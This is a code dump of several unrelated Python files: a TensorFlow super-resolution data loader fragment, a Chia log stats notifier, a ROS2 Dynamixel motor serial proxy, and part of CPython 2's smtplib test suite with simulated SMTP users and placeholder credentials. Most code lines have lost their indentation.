self.img_hr = tf.placeholder(tf.float32, (None,) + image_shape_lr)
# Dequeues element in random order
queue = tf.RandomShuffleQueue(self.queue_size, self.batch_size,
dtypes=(tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32),
shapes=(image_shape_lr_, image_shape_lr, image_shape_lr,
image_shape_lr, image_shape_hr, image_shape_hr))
self.enqueue_many = queue.enqueue_many([self.img_lr, self.img_bicubic, self.img_hr,
self.maml_img_lr, self.maml_img_bicubic, self.maml_img_hr])
self.dequeue_many = queue.dequeue_many(self.batch_size)
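        # In the TF1 API the two positional arguments above are `capacity`
        # (queue_size=256) and `min_after_dequeue` (batch_size): at least one
        # batch worth of samples stays buffered after every dequeue so that
        # dequeue_many() returns well-shuffled batches while the enqueue threads
        # started in start_enqueue_daemon() keep refilling the queue.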
def start_enqueue_daemon(self, sess):
def enqueue_thread(sess):
while(True):
img_lr, img_bicubic, img_hr, maml_img_lr, maml_img_bicubic, maml_img_hr \
= self.next(test=False)
sess.run([self.enqueue_many], feed_dict={
self.img_lr: img_lr,
self.img_bicubic: img_bicubic,
self.img_hr: img_hr,
self.maml_img_lr: maml_img_lr,
self.maml_img_bicubic: maml_img_bicubic,
self.maml_img_hr: maml_img_hr
})
time.sleep(0.02)
thread_number = 1
threads = []
for i in range(thread_number):
t = threading.Thread(target=enqueue_thread, args=(sess,), daemon=True)
t.start()
threads.append(t)
return threads
def augmentation(self, input_img):
'''
input_img: Pillow Image object
returns: Pillow Image object
'''
aug_methods = [
Image.FLIP_LEFT_RIGHT, Image.FLIP_TOP_BOTTOM,
Image.ROTATE_90, Image.ROTATE_180,
Image.ROTATE_270, Image.TRANSPOSE,
Image.TRANSVERSE
]
if(np.random.randint(len(aug_methods) + 1) == 0):
return input_img
else:
return input_img.transpose(np.random.choice(aug_methods))
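        # randint(len(aug_methods) + 1) == 0 keeps the patch unchanged, so each of
        # the 8 dihedral variants (identity plus 7 transpose modes) is drawn with
        # an equal probability of 1/8.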
def choose_random_image(self, test):
if(test):
random_img = os.path.join(self.validation_directory, self.test_list[self.test_i])
self.test_i += 1
if(self.test_i >= len(self.test_list)):
self.test_i = 0
else:
random_img = os.path.join(self.train_directory, np.random.choice(self.train_list))
random_img = Image.open(random_img).convert('RGB')
random_img = random_img.crop((0, 0,
random_img.size[0] - random_img.size[0]%8, random_img.size[1] - random_img.size[1]%8
))
return random_img
def next(self, test):
if(test):
maml_hr_img = self.choose_random_image(test)
else:
#maml_hr_img = self.global_img
maml_hr_img = self.choose_random_image(test)
# patch size on HR image
if(maml_hr_img.size[1] <= self.patch_size or maml_hr_img.size[0] <= self.patch_size):
return self.next(test)
left = np.random.randint(maml_hr_img.size[0] - self.patch_size)
upper = np.random.randint(maml_hr_img.size[1] - self.patch_size)
maml_hr_img = maml_hr_img.crop((left, upper, left + self.patch_size, upper + self.patch_size))
lev2 = maml_hr_img.size
lev1 = (lev2[0]//2, lev2[1]//2)
lev0 = (lev1[0]//2, lev1[1]//2)
maml_lr_img = maml_hr_img.resize(lev1, resample=Image.BICUBIC)
maml_bicubic_img = maml_lr_img.resize(lev2, resample=Image.BICUBIC)
hr_img = maml_lr_img.copy()
lr_img = hr_img.resize(lev0, resample=Image.BICUBIC)
bicubic_img = lr_img.resize(lev1, resample=Image.BICUBIC)
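        # The crops above form a two-level pyramid: lev2 is the HR patch, lev1 its
        # x2 downscale and lev0 its x4 downscale. (maml_lr, maml_bicubic, maml_hr)
        # is the full-scale x2-SR pair, while (lr, bicubic, hr) is the same task
        # rebuilt one octave lower, presumably the inner/adaptation pair for the
        # MAML-style training loop.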
maml_hr_img = np.array(maml_hr_img, dtype=np.float32, ndmin=4)
maml_lr_img = np.array(maml_lr_img, dtype=np.float32, ndmin=4)
maml_bicubic_img = np.array(maml_bicubic_img, dtype=np.float32, ndmin=4)
hr_img = np.array(hr_img, dtype=np.float32, ndmin=4)
lr_img = np.array(lr_img, dtype=np.float32, ndmin=4)
bicubic_img = np.array(bicubic_img, dtype=np.float32, ndmin=4)
return lr_img, bicubic_img, hr_img, maml_lr_img, maml_bicubic_img, maml_hr_img
|
stats_manager.py
|
# std
import logging
import re
from datetime import datetime, timedelta
from typing import cast, List, Union
from threading import Thread
from time import sleep
# project
from . import (
HarvesterActivityConsumer,
PartialConsumer,
BlockConsumer,
WalletAddedCoinConsumer,
FinishedSignageConsumer,
)
from .stat_accumulators.eligible_plots_stats import EligiblePlotsStats
from .stat_accumulators.wallet_added_coin_stats import WalletAddedCoinStats
from .stat_accumulators.search_time_stats import SearchTimeStats
from .stat_accumulators.signage_point_stats import SignagePointStats
from .stat_accumulators.found_proof_stats import FoundProofStats
from .stat_accumulators.number_plots_stats import NumberPlotsStats
from .stat_accumulators.found_partial_stats import FoundPartialStats
from .stat_accumulators.found_block_stats import FoundBlockStats
from src.chia_log.parsers.wallet_added_coin_parser import WalletAddedCoinMessage
from src.chia_log.parsers.harvester_activity_parser import HarvesterActivityMessage
from src.chia_log.parsers.finished_signage_point_parser import FinishedSignagePointMessage
from src.chia_log.parsers.partial_parser import PartialMessage
from src.chia_log.parsers.block_parser import BlockMessage
from src.notifier.notify_manager import NotifyManager
from src.notifier import Event, EventType, EventPriority, EventService
class StatsManager:
"""Manage all stat accumulators and trigger daily notification to the user
with a summary from all stats that have been collected for the past 24 hours.
"""
def __init__(self, config: dict, notify_manager: NotifyManager):
self._enable = config.get("enable", False)
self._notify_time = self._parse_notify_time(config.get("time_of_day", "21:00"))
self._frequency_hours = config.get("frequency_hours", 24)
if not self._enable:
logging.warning("Disabled stats and daily notifications")
return
logging.info("Enabled stats for daily notifications")
self._notify_manager = notify_manager
self._stat_accumulators = [
WalletAddedCoinStats(),
FoundProofStats(),
FoundPartialStats(),
FoundBlockStats(),
SearchTimeStats(),
NumberPlotsStats(),
EligiblePlotsStats(),
SignagePointStats(),
]
logging.info(
f"Summary notifications will be sent out every {self._frequency_hours} "
f"hours starting from {self._notify_time['hour']:02d}:{self._notify_time['minute']:02d}"
)
self._datetime_next_summary = datetime.now().replace(
hour=self._notify_time["hour"], minute=self._notify_time["minute"], second=0, microsecond=0
)
while datetime.now() > self._datetime_next_summary:
self._datetime_next_summary += timedelta(hours=self._frequency_hours)
# Start thread
self._is_running = True
self._thread = Thread(target=self._run_loop)
self._thread.start()
def consume_wallet_messages(self, objects: List[WalletAddedCoinMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, WalletAddedCoinConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_harvester_messages(self, objects: List[HarvesterActivityMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, HarvesterActivityConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_partial_messages(self, objects: List[PartialMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, PartialConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_block_messages(self, objects: List[BlockMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, BlockConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_signage_point_messages(self, objects: List[FinishedSignagePointMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, FinishedSignageConsumer):
for obj in objects:
stat_acc.consume(obj)
def _send_daily_notification(self):
summary = f"Hello farmer! 👋 Here's what happened in the last {self._frequency_hours} hours:\n"
for stat_acc in self._stat_accumulators:
summary += "\n" + stat_acc.get_summary()
stat_acc.reset()
self._notify_manager.process_events(
[Event(type=EventType.DAILY_STATS, priority=EventPriority.LOW, service=EventService.DAILY, message=summary)]
)
def _run_loop(self):
while self._is_running:
if datetime.now() > self._datetime_next_summary:
self._send_daily_notification()
self._datetime_next_summary += timedelta(hours=self._frequency_hours)
sleep(1)
def stop(self):
self._is_running = False
def _parse_notify_time(self, value: Union[str, int], default: dict = {"hour": 21, "minute": 0}) -> dict:
if type(value) == int:
return {"hour": value, "minute": 0}
value = cast(str, value)
match = re.match(r"(?:[01]\d|2[0-3]):(?:[0-5]\d)", value)
if match:
return {"hour": int(value[:2]), "minute": int(value[-2:])}
return default
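    # Illustrative mappings for the parser above (examples only, not executed):
    #   _parse_notify_time("07:45") -> {"hour": 7, "minute": 45}
    #   _parse_notify_time(6)       -> {"hour": 6, "minute": 0}
    #   _parse_notify_time("25:99") -> {"hour": 21, "minute": 0}  (falls back to default)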
|
dynamixel_serial_proxy.py
|
# -*- coding: utf-8 -*-
#
# Software License Agreement (BSD License)
#
# Copyright (c) 2010-2011, Antons Rebguns.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of University of Arizona nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
__author__ = 'Antons Rebguns'
__copyright__ = 'Copyright (c) 2010-2011 Antons Rebguns'
__credits__ = 'Cody Jorgensen, Cara Slutter'
__license__ = 'BSD'
__maintainer__ = 'Antons Rebguns'
__email__ = 'anton@email.arizona.edu'
import math
import sys
import errno
from collections import deque
from threading import Thread
from collections import defaultdict
#import roslib
#roslib.load_manifest('dynamixel_driver')
import rclpy
from rclpy.node import Node
from . import dynamixel_io
from .dynamixel_const import *
from diagnostic_msgs.msg import DiagnosticArray
from diagnostic_msgs.msg import DiagnosticStatus
from diagnostic_msgs.msg import KeyValue
from dynamixel_msgs.msg import MotorState
from dynamixel_msgs.msg import MotorStateList
class SerialProxy(Node):
def __init__(self,
port_name='/dev/ttyUSB0',
port_namespace='ttyUSB0',
baud_rate='1000000',
min_motor_id=1,
max_motor_id=25,
update_rate=5,
diagnostics_rate=1,
error_level_temp=75,
warn_level_temp=70,
readback_echo=False,
node_namespace=None):
super().__init__(port_namespace, namespace=node_namespace)
self.port_name = port_name
self.port_namespace = port_namespace
self.baud_rate = baud_rate
self.min_motor_id = min_motor_id
self.max_motor_id = max_motor_id
self.update_rate = update_rate
self.diagnostics_rate = diagnostics_rate
self.error_level_temp = error_level_temp
self.warn_level_temp = warn_level_temp
self.readback_echo = readback_echo
self.actual_rate = update_rate
self.error_counts = {'non_fatal': 0, 'checksum': 0, 'dropped': 0}
self.current_state = MotorStateList()
self.num_ping_retries = 5
self.motor_states_pub = self.create_publisher(MotorStateList, 'motor_states/%s' % self.port_namespace, 1)
self.diagnostics_pub = self.create_publisher(DiagnosticArray, '/diagnostics', 1)
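    # Typical construction, with the defaults spelled out (values are placeholders,
    # not a recommended configuration):
    #   proxy = SerialProxy(port_name='/dev/ttyUSB0', port_namespace='ttyUSB0',
    #                       baud_rate='1000000', min_motor_id=1, max_motor_id=25)
    #   proxy.connect()   # pings motor IDs and starts the update/diagnostics threads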
def connect(self):
try:
self.dxl_io = dynamixel_io.DynamixelIO(self.port_name, self.baud_rate, self.readback_echo)
self.__find_motors()
except dynamixel_io.SerialOpenError as e:
self.get_logger().fatal(e.message)
raise
self.running = True
if self.update_rate > 0: Thread(target=self.__update_motor_states).start()
if self.diagnostics_rate > 0: Thread(target=self.__publish_diagnostic_information).start()
def disconnect(self):
self.running = False
def __fill_motor_parameters(self, motor_id, model_number):
"""
        Stores some extra information about each motor on the parameter server.
        Some of these parameters are used in the joint controller implementations.
"""
angles = self.dxl_io.get_angle_limits(motor_id)
voltage = self.dxl_io.get_voltage(motor_id)
voltages = self.dxl_io.get_voltage_limits(motor_id)
firmware = self.dxl_io.get_firmware_version(motor_id)
delay = self.dxl_io.get_return_delay_time(motor_id)
self.declare_parameter('%d.model_number' % motor_id, model_number)
self.declare_parameter('%d.model_name' % motor_id, DXL_MODEL_TO_PARAMS[model_number]['name'])
self.declare_parameter('%d.min_angle' % motor_id, angles['min'])
self.declare_parameter('%d.max_angle' % motor_id, angles['max'])
torque_per_volt = DXL_MODEL_TO_PARAMS[model_number]['torque_per_volt']
self.declare_parameter('%d.torque_per_volt' % motor_id, torque_per_volt)
self.declare_parameter('%d.max_torque' % motor_id, torque_per_volt * voltage)
velocity_per_volt = DXL_MODEL_TO_PARAMS[model_number]['velocity_per_volt']
rpm_per_tick = DXL_MODEL_TO_PARAMS[model_number]['rpm_per_tick']
self.declare_parameter('%d.velocity_per_volt' % motor_id, velocity_per_volt)
self.declare_parameter('%d.max_velocity' % motor_id, velocity_per_volt * voltage)
self.declare_parameter('%d.radians_second_per_encoder_tick' % motor_id, rpm_per_tick * RPM_TO_RADSEC)
encoder_resolution = DXL_MODEL_TO_PARAMS[model_number]['encoder_resolution']
range_degrees = DXL_MODEL_TO_PARAMS[model_number]['range_degrees']
range_radians = math.radians(range_degrees)
self.declare_parameter('%d.encoder_resolution' % motor_id, encoder_resolution)
self.declare_parameter('%d.range_degrees' % motor_id, range_degrees)
self.declare_parameter('%d.range_radians' % motor_id, range_radians)
self.declare_parameter('%d.encoder_ticks_per_degree' % motor_id, encoder_resolution / range_degrees)
self.declare_parameter('%d.encoder_ticks_per_radian' % motor_id, encoder_resolution / range_radians)
self.declare_parameter('%d.degrees_per_encoder_tick' % motor_id, range_degrees / encoder_resolution)
self.declare_parameter('%d.radians_per_encoder_tick' % motor_id, range_radians / encoder_resolution)
# keep some parameters around for diagnostics
self.motor_static_info[motor_id] = {}
self.motor_static_info[motor_id]['model'] = DXL_MODEL_TO_PARAMS[model_number]['name']
self.motor_static_info[motor_id]['firmware'] = firmware
self.motor_static_info[motor_id]['delay'] = delay
self.motor_static_info[motor_id]['min_angle'] = angles['min']
self.motor_static_info[motor_id]['max_angle'] = angles['max']
self.motor_static_info[motor_id]['min_voltage'] = voltages['min']
self.motor_static_info[motor_id]['max_voltage'] = voltages['max']
def __find_motors(self):
self.get_logger().info('%s: Pinging motor IDs %d through %d...' % (self.port_namespace, self.min_motor_id, self.max_motor_id))
self.motors = []
self.motor_static_info = {}
for motor_id in range(self.min_motor_id, self.max_motor_id + 1):
for trial in range(self.num_ping_retries):
try:
result = self.dxl_io.ping(motor_id)
except Exception as ex:
self.get_logger().error('Exception thrown while pinging motor %d - %s' % (motor_id, ex))
continue
if result:
self.motors.append(motor_id)
break
if not self.motors:
self.get_logger().fatal('%s: No motors found.' % self.port_namespace)
raise Exception('No motors found.')
counts = defaultdict(int)
to_delete_if_error = []
for motor_id in self.motors:
for trial in range(self.num_ping_retries):
try:
model_number = self.dxl_io.get_model_number(motor_id)
self.__fill_motor_parameters(motor_id, model_number)
except Exception as ex:
self.get_logger().error('Exception thrown while getting attributes for motor %d - %s' % (motor_id, ex))
if trial == self.num_ping_retries - 1: to_delete_if_error.append(motor_id)
continue
counts[model_number] += 1
break
for motor_id in to_delete_if_error:
self.motors.remove(motor_id)
self.declare_parameter('connected_ids', self.motors)
status_str = '%s: Found %d motors - ' % (self.port_namespace, len(self.motors))
for model_number,count in counts.items():
if count:
model_name = DXL_MODEL_TO_PARAMS[model_number]['name']
status_str += '%d %s [' % (count, model_name)
for motor_id in self.motors:
if self.motor_static_info[motor_id]['model'] == model_name:
status_str += '%d, ' % motor_id
status_str = status_str[:-2] + '], '
self.get_logger().info('%s, initialization complete.' % status_str[:-2])
def __update_motor_states(self):
num_events = 50
rates = deque([float(self.update_rate)]*num_events, maxlen=num_events)
last_time = self.get_clock().now()
rate = self.create_rate(self.update_rate)
while rclpy.ok() and self.running:
# get current state of all motors and publish to motor_states topic
motor_states = []
for motor_id in self.motors:
try:
state = self.dxl_io.get_feedback(motor_id)
if state:
motor_states.append(MotorState(**state))
if dynamixel_io.exception: raise dynamixel_io.exception
except dynamixel_io.FatalErrorCodeError as fece:
self.get_logger().error(fece)
except dynamixel_io.NonfatalErrorCodeError as nfece:
self.error_counts['non_fatal'] += 1
self.get_logger().debug(nfece)
except dynamixel_io.ChecksumError as cse:
self.error_counts['checksum'] += 1
self.get_logger().debug(cse)
except dynamixel_io.DroppedPacketError as dpe:
self.error_counts['dropped'] += 1
self.get_logger().debug(dpe.message)
except OSError as ose:
if ose.errno != errno.EAGAIN:
self.get_logger().fatal(errno.errorcode[ose.errno])
#rospy.signal_shutdown(errno.errorcode[ose.errno])
rclpy.shutdown()
if motor_states:
msl = MotorStateList()
msl.motor_states = motor_states
self.motor_states_pub.publish(msl)
self.current_state = msl
# calculate actual update rate
current_time = self.get_clock().now()
rates.append(1000000000.0 / (current_time - last_time).nanoseconds)
self.actual_rate = round(sum(rates)/num_events, 2)
last_time = current_time
rate.sleep()
def __publish_diagnostic_information(self):
diag_msg = DiagnosticArray()
rate = self.create_rate(self.diagnostics_rate)
while rclpy.ok() and self.running:
diag_msg.status = []
diag_msg.header.stamp = self.get_clock().now().to_msg()
status = DiagnosticStatus()
status.name = 'Dynamixel Serial Bus (%s)' % self.port_namespace
status.hardware_id = 'Dynamixel Serial Bus on port %s' % self.port_name
status.values.append(KeyValue(key='Baud Rate', value=str(self.baud_rate)))
status.values.append(KeyValue(key='Min Motor ID', value=str(self.min_motor_id)))
status.values.append(KeyValue(key='Max Motor ID', value=str(self.max_motor_id)))
status.values.append(KeyValue(key='Desired Update Rate', value=str(self.update_rate)))
status.values.append(KeyValue(key='Actual Update Rate', value=str(self.actual_rate)))
status.values.append(KeyValue(key='# Non Fatal Errors', value=str(self.error_counts['non_fatal'])))
status.values.append(KeyValue(key='# Checksum Errors', value=str(self.error_counts['checksum'])))
status.values.append(KeyValue(key='# Dropped Packet Errors', value=str(self.error_counts['dropped'])))
status.level = DiagnosticStatus.OK
status.message = 'OK'
if self.actual_rate - self.update_rate < -5:
status.level = DiagnosticStatus.WARN
status.message = 'Actual update rate is lower than desired'
diag_msg.status.append(status)
for motor_state in self.current_state.motor_states:
mid = motor_state.id
status = DiagnosticStatus()
status.name = 'Robotis Dynamixel Motor %d on port %s' % (mid, self.port_namespace)
status.hardware_id = 'DXL-%d@%s' % (motor_state.id, self.port_namespace)
status.values.append(KeyValue(key='Model Name', value=str(self.motor_static_info[mid]['model'])))
status.values.append(KeyValue(key='Firmware Version', value=str(self.motor_static_info[mid]['firmware'])))
status.values.append(KeyValue(key='Return Delay Time', value=str(self.motor_static_info[mid]['delay'])))
status.values.append(KeyValue(key='Minimum Voltage', value=str(self.motor_static_info[mid]['min_voltage'])))
status.values.append(KeyValue(key='Maximum Voltage', value=str(self.motor_static_info[mid]['max_voltage'])))
status.values.append(KeyValue(key='Minimum Position (CW)', value=str(self.motor_static_info[mid]['min_angle'])))
status.values.append(KeyValue(key='Maximum Position (CCW)', value=str(self.motor_static_info[mid]['max_angle'])))
status.values.append(KeyValue(key='Goal', value=str(motor_state.goal)))
status.values.append(KeyValue(key='Position', value=str(motor_state.position)))
status.values.append(KeyValue(key='Error', value=str(motor_state.error)))
status.values.append(KeyValue(key='Velocity', value=str(motor_state.speed)))
status.values.append(KeyValue(key='Load', value=str(motor_state.load)))
status.values.append(KeyValue(key='Voltage', value=str(motor_state.voltage)))
status.values.append(KeyValue(key='Temperature', value=str(motor_state.temperature)))
status.values.append(KeyValue(key='Moving', value=str(motor_state.moving)))
if motor_state.temperature >= self.error_level_temp:
status.level = DiagnosticStatus.ERROR
status.message = 'OVERHEATING'
elif motor_state.temperature >= self.warn_level_temp:
status.level = DiagnosticStatus.WARN
status.message = 'VERY HOT'
else:
status.level = DiagnosticStatus.OK
status.message = 'OK'
diag_msg.status.append(status)
self.diagnostics_pub.publish(diag_msg)
rate.sleep()
def main(args=None):
rclpy.init(args=args)
    # construct the node outside the try block so the finally clause
    # never references an unbound name if construction fails
    serial_proxy = SerialProxy()
    try:
        serial_proxy.connect()
        rclpy.spin(serial_proxy)
finally:
serial_proxy.disconnect()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
test_smtplib.py
|
import asyncore
import email.utils
import socket
import smtpd
import smtplib
import StringIO
import sys
import time
import select
import unittest
from test import test_support
try:
import threading
except ImportError:
threading = None
HOST = test_support.HOST
def server(evt, buf, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
@unittest.skipUnless(threading, 'Threading required for this test.')
class GeneralTests(unittest.TestCase):
def setUp(self):
self._threads = test_support.threading_setup()
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = test_support.bind_port(self.sock)
servargs = (self.evt, "220 Hola mundo\n", self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
def testBasic1(self):
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testBasic2(self):
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(smtp.sock.gettimeout() is None)
smtp.close()
def testTimeoutValue(self):
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
def setUp(self):
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = StringIO.StringIO()
sys.stdout = self.output
self._threads = test_support.threading_setup()
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
# restore sys.stdout
sys.stdout = self.old_stdout
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, 'Ok')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, 'Ok')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testNotImplemented(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, 'Error: command "EHLO" not implemented')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testVRFY(self):
# VRFY isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, 'Error: command "VRFY" not implemented')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.helo()
expected = (503, 'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.assertEqual(smtp.help(), 'Error: command "HELP" not implemented')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises socket.error
self.assertRaises(socket.error, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(socket.error, smtplib.SMTP,
"localhost:bogus")
# test response of client to a non-successful HELO message
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
self.old_stdout = sys.stdout
self.output = StringIO.StringIO()
sys.stdout = self.output
self._threads = test_support.threading_setup()
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = test_support.bind_port(self.sock)
servargs = (self.evt, "199 no hello for you!\n", self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@somewhere.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_auth_credentials = {
'login': 'TXIuQUBzb21ld2hlcmUuY29t',
'plain': 'AE1yLkFAc29tZXdoZXJlLmNvbQBzb21lcGFzc3dvcmQ=',
'cram-md5': ('TXIUQUBZB21LD2HLCMUUY29TIDG4OWQ0MJ'
'KWZGQ4ODNMNDA4NTGXMDRLZWMYZJDMODG1'),
}
sim_auth_login_password = 'C29TZXBHC3N3B3JK'
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@somewhere.com',],
}
# Simulated SMTP channel & server
class SimSMTPChannel(smtpd.SMTPChannel):
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
smtpd.SMTPChannel.__init__(self, *args, **kw)
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
